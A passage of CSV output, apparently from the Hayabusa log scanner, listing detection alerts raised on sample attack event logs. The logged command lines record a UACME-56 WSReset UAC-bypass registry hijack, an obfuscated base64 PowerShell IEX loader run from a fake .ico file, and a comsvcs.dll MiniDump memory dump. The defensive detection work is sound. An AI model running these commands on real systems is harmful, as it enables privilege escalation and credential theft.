Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.476 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\system32\reg.exe | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.476 +00:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_sysmon/registry_set/registry_set_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.485 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.609 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.949 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3fb | PID: 200 | PGUID: 747F3D96-B07F-5D46-0000-001050C80F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:32.001 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 312 000002806444CB40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3952 | PGUID: 747F3D96-B07F-5D46-0000-0010C1CB0F04,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:32.438 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3b3 | PID: 2112 | PGUID: 747F3D96-B080-5D46-0000-0010D4EA0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:32.438 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass WSReset,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:50.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WSReset.exe"" | LID: 0x18d3b3 | PID: 820 | PGUID: 747F3D96-B091-5D46-0000-001081F71104",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:50.009 +00:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Wsreset UAC Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:50.009 +00:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via WSReset.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:50.455 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | LID: 0x18d3b3 | PID: 7792 | PGUID: 747F3D96-B092-5D46-0000-001089041204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:55.299 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:55.441 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:55.446 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:55.643 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: {4ED3A719-CEA8-4BD9-910D-E252F997AFC2} | Process: C:\Windows\system32\reg.exe | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:55.712 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-05 09:39:30.697 +00:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x38f87e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 09:39:30.697 +00:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-05 09:39:30.697 +00:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx +2019-08-14 11:53:29.688 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 1052 | PGUID: 747F3D96-F639-5D53-0000-001067DA2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.010 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x29126 | PID: 6000 | PGUID: 747F3D96-F639-5D53-0000-001092EE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.022 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0x29126 | PID: 8180 | PGUID: 747F3D96-F639-5D53-0000-0010B0FC2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.022 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.022 +00:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.022 +00:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 11:53:30.022 +00:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_sysmon/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx +2019-08-14 12:17:14.614 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 2476 | PGUID: 747F3D96-FBCA-5D53-0000-0010B8664100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.614 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | LID: 0x29126 | PID: 2876 | PGUID: 747F3D96-FBCA-5D53-0000-001036784100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-14 12:17:14.893 +00:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_sysmon/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx +2019-08-30 12:54:07.873 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript c:\ProgramData\memdump.vbs notepad.exe | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\cmd.exe | LID: 0xe81e5 | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:07.873 +00:00,MSEDGEWIN10,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:07.873 +00:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.257 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2576 | PGUID: 747F3D96-1C6F-5D69-0000-0010323C1F00 | Hash: SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.257 +00:00,MSEDGEWIN10,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/image_load_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.354 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0xe81e5 | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.354 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.354 +00:00,MSEDGEWIN10,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.396 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\notepad.bin | Process: C:\Windows\system32\rundll32.exe | PID: 2888 | PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-08-30 12:54:08.439 +00:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,CredAccess - Memdump | Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2888 | Src PGUID: 747F3D96-1C70-5D69-0000-0010C9661F00 | Tgt PID: 4868 | Tgt PGUID: 747F3D96-1C5C-5D69-0000-0010FEB71E00,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx +2019-09-01 11:54:22.450 +00:00,MSEDGEWIN10,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx +2019-09-01 12:04:22.033 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:445 (MSEDGEWIN10) | Dst: 10.0.2.17:59767 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx +2019-09-01 12:04:22.908 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:62733 (MSEDGEWIN10) | Dst: 10.0.2.17:445 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx +2019-09-03 11:04:07.207 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49947 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:04:07.207 +00:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/net_connection_win_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:04:07.207 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49947 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:04:56.358 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49948 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:04:56.358 +00:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/net_connection_win_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:04:58.463 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49948 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:05:22.837 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx 